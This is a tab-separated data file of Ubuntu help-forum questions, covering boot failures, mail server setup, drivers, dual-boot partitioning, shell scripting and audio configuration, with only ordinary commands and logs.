424331	is there a way to activate network tablet on ubuntu ?	i have the android app called gfxtablet and i only have one program ( gimp ) that the app can give input on gimp . based on the site [ 1 ] , it says that can work with any linux program on the computer . but i do n't know how to get into the network tablet settings on other programs or a global setting for it . is there a way to do it ? i 'm using ubuntu 13.10 32-bit and a nexus 7 2013 . both devices have gfxtablet successfully installed . [ 1 ] http : //rfc2822.github.io/gfxtablet/
424332	packing a .deb package correctly	i 'm trying to create a debian package of the tigcc , a c compiler for ti calculators in correspondence with it 's main developer , who is using fedora and thus can only create and test rpms . i 've got both the x86 binaries and the sources . however i 'd prefer to build it from the sources . tigcc consists of several small programs ( c compiler , linker , assembly ( a68k ) compiler , ... ) with their own makefiles . i think the main problem i 've got is : how do i create a makefile calling the single one* ( i guess $ ( make ) -f ./rel/path/to/makefile ) and where do i have to place it ? the second question is : how do i tell the builder where the single parts are going to be installed ( compiled stuff to /usr/tigcc/bin , doc to usr/share/doc/tigcc , a.s.o. ) ? i 've already tried to create it from the binaries , but it crashed my testing system ( saucy ) and got some problem with it 's dependencies ( tigcc depends on libc6 )
424334	nautilus open terminal not working	i have installed nautilus-open-terminal but still i am not getting the open terminal option .
424335	boot problem , stuck in busybox	i updated the system yesterday and was then prompted to restart . it restarted fine and all seemed normal . after a little while , i started having trouble watching a stream on blogtalkradio while in chrome , so i opened up firefox and it seemed to stream fine there . about 15 or so minutes later , i closed chrome thinking restarting it might help , and then hit ctrl+t in firefox to open a new tab ... as soon as i hit that , firefox closed and would n't re-open - neither would chrome . so i reboot the system again , but ever since then , it always jumps immediately to the busybox terminal . i 've tried rebooting with different versions in grub , but still get a version of busybox every time . i ran the grub memory test and a hard drive diagnostics test from the boot device menu ( available after hitting f12 ) - both passed . i ran through some of the threads on here to no avail . i was running the latest version of ubuntu by itself ( windows has n't been on this computer since 2010 ) and i basically have no knowledge when it comes to running terminal code . i created a usb boot drive with linuxlive usb creator , but every time i try to boot from it , i still get thrown to a busybox terminal ( albeit different font this time ) . when i type dmesg|tail using the usb drive i get : [ 7.702519 ] sd 4:0:0:0 : [ sdc ] mode sense : 23 00 00 00 [ 7.703132 ] sd 4:0:0:0 : [ sdc ] no caching mode page found [ 7.703139 ] sd 4:0:0:0 : [ sdc ] assuming drive cache : write through [ 7.706138 ] sd 4:0:0:0 : [ sdc ] no caching mode page found [ 7.706149 ] sd 4:0:0:0 : [ sdc ] assuming drive cache : write through [ 7.707531 ] sdc : [ 7.709754 ] sd 4:0:0:0 : [ sdc ] no caching mode page found [ 7.709765 ] sd 4:0:0:0 : [ sdc ] assuming drive cache : write through [ 7.709773 ] sd 4:0:0:0 : [ sdc ] attached scsi removable disk [ 7.762829 ] switched to clocksource tsc when i run that command booting from the hdd , i get basically the same lines , only with different numbers in brackets and there 's a line that comes before the first mode sense : 23 00 00 00 line ; all it says is write protect is off . i also do n't have the final switched to clocksource tsc line . there 's not really anything else that i know how to do , so any help appreciated . edit : when booting from the usb , no matter which option i choose ( persistent , live , or install ) , i always get sent to the busybox terminal . edit2 : i read to try typing exit as well , which gives me : /init : line 352 : ca n't open /root/dev/console : no such file [ 6.535057 ] kernal panic - not syncing : attempted to kill init ! exitcode=0x00000200 [ 6.535057 ] [ 6.535124 ] cpu : 0 pid : 1 comm : init not tained 3.11.0-17-generic # 31-ubuntu [ 6.535175 ] hardware name : dell inc. dimension xps gen 3 /0k3464 , bios a02 08/23/2004 [ 6.535242 ] 00000000 00000000 f7097f18 c1627735 c18fb3e0 f7097f38 c1623790 c17f955c [ 6.535328 ] c1a6a800 f7097f24 c18fb3e0 f7098418 f7098000 f7097f8c c1054dbe c17f9880 [ 6.535412 ] 00000200 00000028 00000004 f709841a 00000001 00000001 00000002 f7097f88 [ 6.535496 ] call trace : [ 6.535523 ] [ < c1627735 > ] dump_stack+0x41/0x52 [ 6.535559 ] [ < c1623790 > ] panic+0x87/0x181 [ 6.535593 ] [ < c1054dbe > ] do_exit+0x7de/0x8e0 [ 6.535627 ] [ < c116b554 > ] ? vfs_write+0x144/0x1b0 [ 6.535662 ] [ < c1054f34 > ] do_group_exit+0x34/0xa0 [ 6.535697 ] [ < c1054fb6 > ] sys_exit_group+0x16/0x20 [ 6.535734 ] [ < c1634e8d > ] sysenter_do_call+0x12/0x28 [ 6.535779 ] drm_kms_helper : panic occured , switching back to text console _ at this point it becomes unresponsive .
424342	no compatible screen mode found , blurry screen	when i started up my computer one day , the resolution was all blurry and when i logged in it came up with this error message : none of the selected modes were compatible with the possible modes : trying modes for crtc 81 crtc 81 : trying mode 1024x768 @ 61hz with output at 1440x900 @ 50hz ( pass 0 ) crtc 81 : trying mode 800x600 @ 61hz with output at 1440x900 @ 50hz ( pass 0 ) crtc 81 : trying mode 640x480 @ 60hz with output at 1440x900 @ 50hz ( pass 0 ) crtc 81 : trying mode 1024x768 @ 61hz with output at 1440x900 @ 50hz ( pass 1 ) crtc 81 : trying mode 800x600 @ 61hz with output at 1440x900 @ 50hz ( pass 1 ) crtc 81 : trying mode 640x480 @ 60hz with output at 1440x900 @ 50hz ( pass 1 ) if anyone can help please do ! i can still use ubuntu but the mouse sometimes goes glitchy . ( i am using an acer al1916w a as a display and an amd athlon ii processor . )
424343	could not install java and any other software	when i am installing any software form either terminal or synaptic-package-manager i always get this error message , repeatedly : errors were encountered while processing : oracle-java7-installer e : sub-process `/usr/bin/dpkg` returned an error code ( 1 ) can anybody please give me an explanation why and the meaning of this error . how can i fix it ?
424344	ubuntu 13.10 - driver for dymo labelwriter 450 fastest printer	i have this super fast label writer printer which works perfect in windows 7 but i need to use it in ubuntu 13.10 because my python software is only ubuntu 13.10 compatible . but when i do printing it does not find the printer . lsusb : bus 003 device 004 : id 0922:0020 dymo-costar corp. labelwriter 450 downloaded driver : $ get https : //dymo.custhelp.com/app/answers/detail/a_id/101/~/dymo-drivers-and-downloads # lw_mac $ apt-get install libcups2-dev $ apt-get install libcupsimage2-dev $ ./configure $ make & & make install test print : http : //www.labelwriter.com/software/dls/sdk/samples/js/printlabel/printlabel.html fails
424346	postfix keeps rejecting emails	i have setup dovecot and postfix on my server . i am able to send emails though smtp to my gmail account and authenticate thunderbird to my server via imap . however , when i send an email from my gmail account to the address from my server ( admin @ foobar.com ) , the email gets rejected and i am told the user was not found in the local recipents table . i suspect that postfix somehow fails to work with my dovecot userdb file . here is my postfix ' main.cf : # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file = /etc/dovecot/dovecot.pem smtpd_tls_key_file = /etc/dovecot/private/dovecot.pem smtpd_use_tls = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination myhostname = foobar.com mydomain = foobar.com mydestination = foobar.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = foobar.com , localhost.lan , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_command = /usr/lib/dovecot/deliver -c /etc/dovecot/dovecot.conf -m `` $ { extension } '' mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all home_mailbox = maildir/ smtpd_sasl_auth_enable = yes smtpd_sasl_type = dovecot smtpd_sasl_path = private/dovecot-auth smtpd_sasl_authenticated_header = yes smtpd_sasl_security_options = noanonymous smtpd_sasl_local_domain = $ myhostname broken_sasl_auth_clients = yes smtpd_recipient_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipeli $ smtpd_sender_restrictions = reject_unknown_sender_domain smtp_use_tls = yes smtpd_tls_received_header = yes smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_auth_only = yes tls_random_source = dev : /dev/urandom virtual_mailbox_base = /home/vmail virtual_mailbox_maps = hash : /etc/postfix/vmailbox virtual_mailbox_domains = foobar.com virtual_minimum_uid = 100 virtual_uid_maps = static:2222 virtual_gid_maps = static:2222 virtual_transport = dovecot dovecot_destination_recipient_limit = 1 smtpd_sasl_auth_enable = yes smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_local_domain = $ mydomain smtpd_tls_security_level = may smtpd_tls_cert_file=/etc/ssl/certs/mail.crt smtpd_tls_key_file=/etc/ssl/private/mail.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_received_header = yes tls_random_source = dev : /dev/urandom my postfix ' vmailbox file looks like this : admin @ foobar.com foobar.com/admin/ office @ foobar.com foobar.com/office/ this is my dovecot 's local.conf : protocols = imap imaps disable_plaintext_auth = no ssl_cert_file = /etc/ssl/certs/mail.crt ssl_key_file = /etc/ssl/private/mail.key mail_location = maildir : /var/mail/vhosts/ % d/ % n auth default { mechanisms = plain login userdb { driver = passwd-file args = /home/vmail/foobar.com/passwd default_fields = uid=vmail gid=vmail home=/home/vmail/ % d/ % u } passdb { driver = passwd-file args = /home/vmail/foobar.com/passwd } socket listen { client { path = /var/spool/postfix/private/auth mode = 0660 user = postfix group = vmail } master { path = /var/run/dovecot/auth-master mode = 0600 user = vmail group = vmail } } } here is the link of the guide i followed ( in german )
424348	why is the ui allowed to halt/reboot	why is the ubnutu ui allowed ( as in many other linux distros ) to halt/reboot the computer , but the logged in user in command line not ? does the ui run in superuser mode mode ? or how can that be done by the system ?
424352	i installed ubuntu from wubi alonside win8 can i get the gnu grub insted of the win8 bootloder	hi i have successfully installed ubuntu alongside win8 ( using wubi ) . i installed ubuntu on a separate hard drive but the win8 bootloder is slow . can i get grub in some way ? i have attempted booting of the disk ubuntu was installed on .
424353	community support for 2013 nexus 7 wi-fi only	i understand there is some ( unofficial ) community activity involving installing touch on nexus 7 2013 . can someone direct me to where i can learn to install and operate ?
424355	ubuntu freezes while installing	i am trying to install ubuntu 12.04 , but every time i get to the restart computer screen my computer freezes . then when i try to restart my computer manually i get a black screen with a flashing -
424356	looking to dual-boot ubuntu 13.10 with vista ( vista installed first ) on toshiba equium a210-1as	first things first , i already have a partition to install ubuntu on . the laptop is a toshiba equium a210-1as with vista and windows 8.1 . i want to take 8.1 off and install ubuntu instead . i know how to install ubuntu so that 's all good . now to the question . will i have to worry about drivers ?
424357	how do i reformat my hard drive to ntfs ?	i just installed ubuntu yesterday on my windows vista computer . upon installing ubuntu , i accidentally deleted everything and i guess i made my hd dedicated only to ubuntu . i inserted my recovery disk for my windows vista and upon trying to install it , it gave me this message : windows must be installed to a partition formatted as ntfs so my question is how do i uninstall ubuntu so my hd is back to ntfs format so i can re-install my windows vista and then when i have all that installed , i 'll re-install ubuntu again , but this time , i 'll install it alongside my windows vista .
424366	script to rename files	i appreciate any help in advance . i have written a script to rename all .bmp files , and it seems to work , but i get the following error/message for each file : im2019.bmp mv : can not stat `im2000.bmp ' : no such file or directory mv : can not stat `im2001.bmp ' : no such file or directory mv : can not stat `im2002.bmp ' : no such file or directory mv : can not stat `im2003.bmp ' : no such file or directory mv : can not stat `im2004.bmp ' : no such file or directory mv : can not stat `im2005.bmp ' : no such file or directory mv : can not stat `im2006.bmp ' : no such file or directory mv : can not stat `im2007.bmp ' : no such file or directory mv : can not stat `im2008.bmp ' : no such file or directory mv : can not stat `im2009.bmp ' : no such file or directory mv : can not stat `im2010.bmp ' : no such file or directory mv : can not stat `im2011.bmp ' : no such file or directory mv : can not stat `im2012.bmp ' : no such file or directory mv : can not stat `im2013.bmp ' : no such file or directory mv : can not stat `im2014.bmp ' : no such file or directory mv : can not stat `im2015.bmp ' : no such file or directory mv : can not stat `im2016.bmp ' : no such file or directory mv : can not stat `im2017.bmp ' : no such file or directory mv : can not stat `im2018.bmp ' : no such file or directory mv : can not stat `im2019.bmp ' : no such file or directory i have the following files in the directory : hristo @ hassangrad27 : ~/desktop/test $ ls im0000.bmp im0011.bmp im1002.bmp im1013.bmp im2004.bmp im2015.bmp im0001.bmp im0012.bmp im1003.bmp im1014.bmp im2005.bmp im2016.bmp im0002.bmp im0013.bmp im1004.bmp im1015.bmp im2006.bmp im2017.bmp im0003.bmp im0014.bmp im1005.bmp im1016.bmp im2007.bmp im2018.bmp im0004.bmp im0015.bmp im1006.bmp im1017.bmp im2008.bmp im2019.bmp im0005.bmp im0016.bmp im1007.bmp im1018.bmp im2009.bmp rename im0006.bmp im0017.bmp im1008.bmp im1019.bmp im2010.bmp rename~ im0007.bmp im0018.bmp im1009.bmp im2000.bmp im2011.bmp stringtest im0008.bmp im0019.bmp im1010.bmp im2001.bmp im2012.bmp stringtest~ im0009.bmp im1000.bmp im1011.bmp im2002.bmp im2013.bmp im0010.bmp im1001.bmp im1012.bmp im2003.bmp im2014.bmp and i can get my files to be renamed as such : hristo @ hassangrad27 : ~/desktop/test $ ls cam1-0.bmp cam1-3.bmp cam2-15.bmp cam2-9.bmp cam3-2.bmp cam1-10.bmp cam1-4.bmp cam2-16.bmp cam3-0.bmp cam3-3.bmp cam1-11.bmp cam1-5.bmp cam2-17.bmp cam3-10.bmp cam3-4.bmp cam1-12.bmp cam1-6.bmp cam2-18.bmp cam3-11.bmp cam3-5.bmp cam1-13.bmp cam1-7.bmp cam2-19.bmp cam3-12.bmp cam3-6.bmp cam1-14.bmp cam1-8.bmp cam2-1.bmp cam3-13.bmp cam3-7.bmp cam1-15.bmp cam1-9.bmp cam2-2.bmp cam3-14.bmp cam3-8.bmp cam1-16.bmp cam2-0.bmp cam2-3.bmp cam3-15.bmp cam3-9.bmp cam1-17.bmp cam2-10.bmp cam2-4.bmp cam3-16.bmp rename cam1-18.bmp cam2-11.bmp cam2-5.bmp cam3-17.bmp rename~ cam1-19.bmp cam2-12.bmp cam2-6.bmp cam3-18.bmp stringtest cam1-1.bmp cam2-13.bmp cam2-7.bmp cam3-19.bmp stringtest~ cam1-2.bmp cam2-14.bmp cam2-8.bmp cam3-1.bmp this is the script : # ! /bin/bash # specify directory for i in $ ( ls *.bmp ) do str= '' $ i '' echo $ str charim= $ { str:2:1 } # echo $ charim if [ `` $ charim '' -eq 0 ] & & [ `` $ charim '' -ne 1 ] & & [ `` $ charim '' -ne 2 ] ; then # echo `` 1 '' for j in { 0..9 } do mv im000 $ j.bmp cam1- $ j.bmp done for j in { 10..19 } do mv im00 $ j.bmp cam1- $ j.bmp done fi if [ `` $ charim '' -ne 0 ] & & [ `` $ charim '' -eq 1 ] & & [ `` $ charim '' -ne 2 ] ; then # echo `` 2 '' for j in { 0..9 } do mv im100 $ j.bmp cam2- $ j.bmp done for j in { 10..19 } do mv im10 $ j.bmp cam2- $ j.bmp done fi if [ `` $ charim '' -ne 0 ] & & [ `` $ charim '' -ne 1 ] & & [ `` $ charim '' -eq 2 ] ; then # echo `` 3 '' for j in { 0..9 } do mv im200 $ j.bmp cam3- $ j.bmp done for j in { 10..19 } do mv im20 $ j.bmp cam3- $ j.bmp done fi done what causes the error/warning ? thanks a lot
424369	can not connect to usb storage device with sofware through wine1.6.1 on 64bit ubuntu 12.04lts	would apprciate any help on this matter . can not connect to usb storage device with sofware through wine1.6.1 on 64bit ubuntu 12.04lts . the device is like a mass stroage device . it is storing gps information . the 32 bit software that is used to down load the stored data works on windows xp , since winxp will no longer be supported by microsoft for free i have to find a new way to continue to use the hardware . so i am making the jump to linux . i have a liitel experieince with linux but i am not no way an expert . i have used wine to install the windows software and drivers for the device and to run the windows software to attempt to down load the data sotred on it . when i connect the device to a usb port the led on the device comes on but the software can not connect to the device . i get a message , failed to connect to the device make sure the device is connected . what suggestions do you have for me to check to see if i can make sure the device is being detected by linux and how to connect to it . thanks , jd
424370	ca n't run screen due to `` can not open terminal '/dev/pts/1 ' - please check '' error	to learn some server management i just created a new ubuntu 12.04 server . since i only had a root account i created a new user with adduser kramer65 . i then switched to that user using su kramer65 . i now want to run screen , so i typed screen and hit enter , after which i 'm presented with this line : can not open your terminal '/dev/pts/1 ' - please check . and here i 'm lost . why does n't it open screen , and what should i do with the very helpful tip `` please check '' ? all tips are welcome !
424371	ca n't run fifa autobuyer due to `` directory name invalid '' error	i am trying to run a fifa autobuyer , but when i open with wine a message box pops up with the the error : directory name invalid . the program requires vcredist 2008 . i have ubuntu 13.10 and wine 1.7 . also i checked the program as an executable . here is the program : http : //geminiautobuyer.com/download ( select the link for gemini autobuyer 6.5.1 ) and a screenshot :
424372	wifi only works after turning the pc to standby ( ubuntu 12.04 )	i have a pc on which i 've installed ubuntu 12.04 in dual-boot with windows 8.1 . my problem is when i start the pc on ubuntu , wifi does n't work , but if i put my computer in standby then i get it out from standby , wifi works ... my pc is the asus x552c and my wifi card is the atheros 9485 . thank you per advance !
424374	is the a way to make hp-scan or scanimage to automatically select de right area to scan ?	i 'm trying to make an non network scanner to work with linux running via command line and hiding it with php/html . the commands to scan hp-scan and scanimage are working well but they do n't automatically select the non blank are to scan . for example if i scan a business card ( 85mm x 58mm ) it scans the entire scanner area . does sane have an utility to fix that ? i am using ubuntu 13 and mint 16. scanimage -- mode color -- resolution 100 -- progress -- compression jpeg -- jpeg-quality 80 -- format=tiff | convert tiff : - teste.jpg
424375	how do i get a broadcom bcm4318 wireless card on a dell latitude d510 working ?	iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . lspci -vnn | grep network broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 )
424376	command line : how to give right to log in using ssh to user ?	to learn some server management i just created a new ubuntu 12.04 server . since i only had a root account i created a new user with adduser kramer65 . i now want to ssh into the server using that new user . unfortunately , it does n't seem to work ; it constantly says `permission denied , please try again.` any idea how i could grant the user kramer65 the right to log in using ssh ?
424377	setting path to /etc/profile or /etc/environment does not work with sudo	i want to launch intellij idea ide via sudo idea.sh . sudo because ide needs to manupulate files from /etc/share . idea.sh is placed at /home/ < username > / < path > /bin/idea.sh . i tried to add this path to path environment variable by adding export path= '' $ path '' : < path-to-idea > /bin to /etc/profile or by changing string in /etc/environment from path= '' blahblah '' to path= '' < path-to-idea > /bin : blahblah '' . in both cases after sudo echo $ path command i got string with my path to idea added . but when i tried to execute idea.sh via sudo idea.sh i got sudo : idea.sh : command not found . what am i doing wrong ?
424381	update information outdated ( conflicting message ? )	i get this alert and it says that : the update information is outdated . this may be caused by network problems or py a repository that is no longer available . please update manually by clicking on this icon and then selection 'check for updates ' and checking if some of the listed repositories fail . but when i check out for updates it says everything is updated already but the red alert is still there , is there a problem with ubuntu ?
424382	how to install ubuntu 12.04.3 on powermac g5 from cd with `` fixing recursive fault but reboot is needed '' error ?	i am installling ubuntu 12.04.3 lts powerpc on a powermac g5 . when i tried 'live video=ofonly ' as the boot parameter i got a 'fixing recursive fault but reboot is needed ! ' error message . i then tried 'live snd-powermac.blacklist=yes ' as per the reecommendation of https : //wiki.ubuntu.com/powerpcknownissues and got a screen that was identical to 'live ' in the sense that it froze at 'return from prom-init ' and nothing else happened . do i need to adjust some parameter in the openfirmware or boot prompt , or should i try some combination of the parameters 'video=ofonly ' & 'snd-powermac.blacklist=yes ' . any help would be greatly appreciated .
424384	why ca n't youtube , audacity , tartini and pulseaudio all get along ?	( this is on ubuntu 12.04 lts with all the latest updates applied . ) one audio application i use a lot is audacity , both as an audio player and as a recorder , usually with the cheapest headsets i can find . i also use youtube a lot ( i.e . flash in firefox ) . the two work together pretty well : e.g . i can play audio from both simultaneously . recently , i started to use another audio application : tartini . thanks to jeremy salwen 's and jevon longdell 's efforts , it compiled without any problems , and after getting opengl to work , it runs , too . so i expected it to mix in with the other two : but it does n't . initially , it would n't play any audio at all . somehow , i found out that in ubuntu 's `` sound settings '' i had to select 'digital output ( s/pdif ) ' before audio played back with tartini would be audible - but this mutes youtube and audacity . i do n't want to need to switch between 'digital ' and non-'digital ' outputs depending on the application i happen to be using . i do n't care whether 'outputs ' ( whatever they are ) are 'digital ' ( whatever that means ) ; i just want sound produced by an application to play whenever i ask it to , whether or not some other application happens to be playing or recording sound at that time . somehow , i found out that there is an application called 'paprefs ' that has an option to enable 'simultaneous output on all local sound cards ' , whatever that means , so i installed it and enabled that option : this gave me a new option in the sound settings : and after i selected that , audacity and tartini would both play audio , not simultaneously , but whichever was started first . at least , that was the case for a short while ; then the previous behavior returned . after rebooting , the new behavior was restored : i can now play sound from audacity and/or youtube , simultaneously if i wish ; or from tartini ; but never from audacity and tartini , or youtube and tartini , at the same time . however , the ubuntu sound settings and pavucontrol are no longer available : pavucontrol claims it ca n't connect to pulseaudio : and indeed , nothing related to pulse is running on my system . questions : what on earth is going on ? how do i find out ? can youtube and tartini play sound at the same time ? ... while pulseaudio is running ? how ? / why not ? how does my audio processing hardware come into this ? lspci says i have a 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 )
424392	install ati radeon hd in ubuntu 13.10	i saw this . and downloaded this in amd page . which of these two should i use ? , my graphic card is ati radeon hd 5450 . also , i do n't understand what exactly amd64 means when talking about this graphic card , my cpu is a corei5 , i think this amd64 is not related with my cpu , but any insight in the topic is greatly appreciated . update i tried first link , previously i reinstalled video related packages and it worked again but now is completely broken . update 2 reinstall worked , i was forgetting * in apt-get remove fglrx* . update 3 another option i found is this one .
424395	understanding ubuntu juju installed in amazon cloud	i will explain , what i have : i created an instance from ubintu juju ami from community amis . i connected to this instance using ssh . i would like to deploy a `` charms '' here , in my instance . but , when i try to do `` juju add-unit juju-gui '' it says me : error could not find aws_access_key_id also , i installed a juju client , configured it , tried to deploy a charm , but it creates a new instance every time for every deploy command . i wonder , if you could explain me , how should i work with juju ? i need to install jenkins , and other dev tools in one instance .
424396	disable tabs in firefox ?	in recent versions of ubuntu and particularly the upcoming 14.04lts , i find that i prefer to not use tabs in firefox , but rather use the app spread . so that 's what i do . however , i have n't found a way to remove the tab bar from firefox and it seems kind of pointless for every one-page window to have a tab bar containing only one tab . sometimes , it also fools me into using the new-tab button from old habit , so it would really be quite useful to be able to remove that bar altogether .
424397	vi/vim headers in files	recently i 've come across several files with vim headers in them , and i have been unable to locate the source of what they are used for . as an example : # vi : set ft=ruby : i understand that set ft=ruby would set the syntax of the file as ruby syntax highlighted ( if you do that sort of thing ) . is this a new vim convention , inserted by a plugin , some voodoo from the nether ?
424399	dns server does not return my ip	i 'm setting up a dns server on ubuntu 12.04 , when i write host `` my domain '' in a terminal , it returns 127.0.0.1 instead of the ip that i assigned , i have proven putting # in the line `` dns = dnsmasq '' of networkmanager.conf but did not work . ip is 10.0.2.3 the mask is 255.255.255.0 the gateway is 10.0.2.2 reverse lookup zone is 2.0.10 if anyone can help me i would appreciate
424400	ubuntu 13.10 - no ext2/ext3 available	i need to make a dcp ( digital cinema package ) for a short film of mine . digital projectors read ext2 or ext3 formatted drives best , so using a mac i put ubuntu on a cd and have been booting up the computer to run off the image . so when i go into disk and click to format/partition my flash drive i only get the option for ext4 . from what i can gather , ext4 is n't recognizable for these projectors . it needs to be ext2 or ext3 but i have absolutely no option to format my flash drive to any of these filesystems . i 'm completely new to linux so i have no idea how to fix this . anybody ? thanks !
424401	encfs , dropbox and suddenly lower cases	this is a long-shot , but i wonder if anyone has experienced the same as i just did . i have ubuntu 12.04 at home and at work . all partitions involved are ext4 . the set-ups at home and at work are pretty much identical . i use dropbox . in dropbox i have an encfs volume . i discovered the other day that there is a folder in the mounted encfs volume that would not appear at home , but it does appear at work . at home , i run $ encfsctl showcruft ~/dropbox/encrypted-folder/ and surely there is an error : ... in directory //hello/whatever/blablabla : /home/me/dropbox/encrypted-folder/wopxcmys41/r3g4ki/90qsu8af9tt4p1/knnxeyz12y4cs0lk01 ... it is the folder knnxeyz12y4cs0lk01 that will not appear mounted at home . today i discovered that it is called knnxeyz12y4cs0lk01 at work . the difference is that all letters have been converted to lower case at home . dropbox does not complain , though clearly there is a discrepancy . at work i copied the knnxeyz12y4cs0lk01 folder to a usb stick and at home i pasted it into my encrypted folder . it mounts without any problems . there are several , but not all , subfolders and files inside of the corrupted knnxeyz12y4cs0lk01 folder that also suffer from all letters being changed to lower case . question : has this happened to anyone else ? i have no idea what caused it . i do not have any windows machines involved where case-sensitivity is an issue . why does not dropbox recognise the discrepancy in the filenames and resyncs ? what converted filenames to lower-case in first place ? encfs ? when something like this happens you always get a bit paranoid and wonder what else could be corrupted .
424402	first boot not happening [ 7.471657 ] adding 4041724k swap on /dev/sda7 priority : -1 extents : 1 across :4041724k fs	i have been trying to get ubuntu up and running in dual boot , this is the first time i have tried to install linux . everything was going well with the install , the progress bar had reached the end of installing files and then i got a black screen with a few lines of writing on it that forced my laptop to shut down . on booting i was taken to grub , where i have the option to boot in ubuntu and windows ( and some other options ) , when booting ubuntu i am sent to a black screen with blinking cursor . i can type there , but nothing else happens . courtesy of some help here , i was sent to this page -- my computer boots to a black screen , what options do i have to fix it ? i followed instructions for black/purple screen on booting for the first time , changing `` quiet splash '' to `` nomodeset '' and hitting ctrl-k . i am now taken to a black screen with a lot of stuff going on line by line and then the last line is : [ 7.471657 ] adding 4041724k swap on /dev/sda7 priority : -1 extents : 1 across :4041724k fs underneath that line i am left with the blinking cursor again and nothing happens . extra details : i installed ubuntu onto a partition i used a usb created with linux/live for install using ubuntu 13.10 not sure if this detail is relevant but i noticed that python 3 and some other files were uninstalled after being installed when i watched what files were being written during the progress bar on installation . just struck me as strange . any ideas on what i can do to get things working ? edit : here is the output of sudo apt-get update : sudo : unable to resolve host ( none ) ign cdrom : //ubuntu 13.10 _saucy salamandor - release amd 64 ( 20131016.1 ) saucy inrelease ign cdrom : //ubuntu 13.10 _saucy salamandor - release amd 64 ( 20131016.1 ) saucy release.jpg w : not using locking for read only file /var/lib/opt/lists/lock e : could n't create temporary file work with /var/lib/apt/lists/ubuntu % 2013.10 % 20 % 5fsaucy % 20salamander % 5f % 20- % 20release % 20amd64 % 20 ( 20131016.1 ) _dists_saucy_release - mkstemp ( 30 : read - only file system ) w : not using locking for read only lock file `` /var/lib/dpkg/lock `` e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem so i then typed in sudo dpkg -- configure -a , and i got this : $ sudo : unable to resolve host ( none ) $ dpkg : error : unable to access dpkg status area : read - only file system edit 2 : having typed mount -o rw , remount / i get this output : mount : /dev/sda6 already mounted or / busy mount : according to mtab /dev/sda6 is already mounted on / at this point i also typed mount -- all ( although not sure if i need to ) , but nothing happened . i did this having searched for and followed this -- how do i boot into recovery mode ? edit 3 : here is the pic from gparted - http : //tinypic.com/view.php ? pic=n3k85d & s=8 # .uwqtgyxsviu yep , so sudo dpkg -- configure -a did yield some results . there were a lot lines , particularly `` setting up lib '' lines such as setting up libfa0 ( 0.9.3.5 ) . i did notice in the middle of the lines somewhere it stated package in a very bad inconsistent state , and the final line read : errors were encountered while processing : libfluidsynth : amd64 then when i typed sudo apt-get update i got : sudo : unable to resolve host ( none ) ign cdrom : //ubuntu 13.10 _saucy salamandor - release amd 64 ( 20131016.1 ) saucy inrelease ign cdrom : //ubuntu 13.10 _saucy salamandor - release amd 64 ( 20131016.1 ) saucy release.jpg w : not using locking for read only file /var/lib/opt/lists/lock e : could n't create temporary file work with /var/lib/apt/lists/ubuntu % 2013.10 % 20 % 5fsaucy % 20salamander % 5f % 20- % 20release % 20amd64 % 20 ( 20131016.1 ) _dists_saucy_release - mkstemp ( 30 : read - only file system ) w : not using locking for read only lock file `` /var/lib/dpkg/lock `` ... which is almost the same as the first time you told me to sudo apt-get update except for the last line - now e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem is not there .
424404	clean install of ubuntu 13.10	when i was installing ubuntu 13.10 , i thought it gives me an option to wipe out my win xp it did not now i have both xp and ubuntu , and i have to choose every time i boot . how do i change it so that i only have ubuntu , i do n't care if i loose all with my win xp
424406	xubutu , right click so slow	i 'm on xubuntu 13.10 64 bit . i 'm running xfce4 version 4.10 , thunar version 1.6.3 if you right click on the desktop , the menu might never show up , if you right click in thunar , you 'll have to wait like 10s or more for it to show up . if you right click in thunar - > create a new document , you 'll have to wait like 30s for the menu to show up . ( sometimes it never does ) . there 's only one similar question , here , i followed the instructions in the accepted answer , it does n't fix it , the right click menu is as slow as ever . the second answer , well it 's not my first time . i need a third answer that was n't given there .
424407	problem with safe graphics mode	im installing dual boot ubuntu 13.10 along win8.1 , i have an acer aspire 522 with a graphics card amd radeon hd 8400 , this graphic card gives problems , soy i installed it with the nomodeset in the edit options , but when i boot the system , i should go and run the safe graphics mode to install the catalyst drivers un go to the amd drivers web , but when i run the safe mode , happens this : link , is this normal ?
424411	22gb ssd + 500gb hdd ( i want windows and ubuntu + share files )	ssd : -1_ubuntu 12.04.4 x64 ( ext4 ) [ 26gb ] -2_swap [ 6gb ] hdd : -3_windows 7 sp1 x64 + programs ( ntfs ) [ 150gb ] -4_ubuntu programs and files ( ext4 ) [ 100gb ? ] < -- `` /home '' ? -5_personal data ( for ubuntu and windows ) < -- -- - `` /home '' ? its ok ? how can i do that ?
